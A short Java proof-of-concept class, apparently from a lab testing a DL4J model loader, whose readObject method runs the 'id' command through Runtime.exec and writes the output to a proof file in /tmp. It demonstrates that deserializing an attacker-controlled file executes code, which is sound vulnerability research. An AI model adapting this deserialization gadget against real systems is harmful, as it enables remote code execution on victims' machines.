import java.io.*; // A Serializable class whose readObject side-effects, proving the loader // invokes ObjectInputStream.readObject() on attacker-controlled preprocessor.bin. // (Stands in for a real ysoserial gadget; this class is on the classpath only // to PROVE the deser primitive fires on standard load.) public class Evil implements Serializable { private static final long serialVersionUID = 1L; String note; private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException { in.defaultReadObject(); try { String marker = "MARKER_DL4J_DESER_7Q3X note=" + note + " whoami="; Process p = Runtime.getRuntime().exec(new String[]{"id"}); java.io.ByteArrayOutputStream bo = new java.io.ByteArrayOutputStream(); byte[] buf=new byte[1024]; int n; InputStream is=p.getInputStream(); while((n=is.read(buf))>0) bo.write(buf,0,n); marker += bo.toString().trim(); try (FileWriter fw = new FileWriter("/tmp/dl4jlab/DL4J_DESER_PROOF.txt")) { fw.write(marker + "\n"); } System.err.println(marker); } catch (Exception e) { e.printStackTrace(); } } }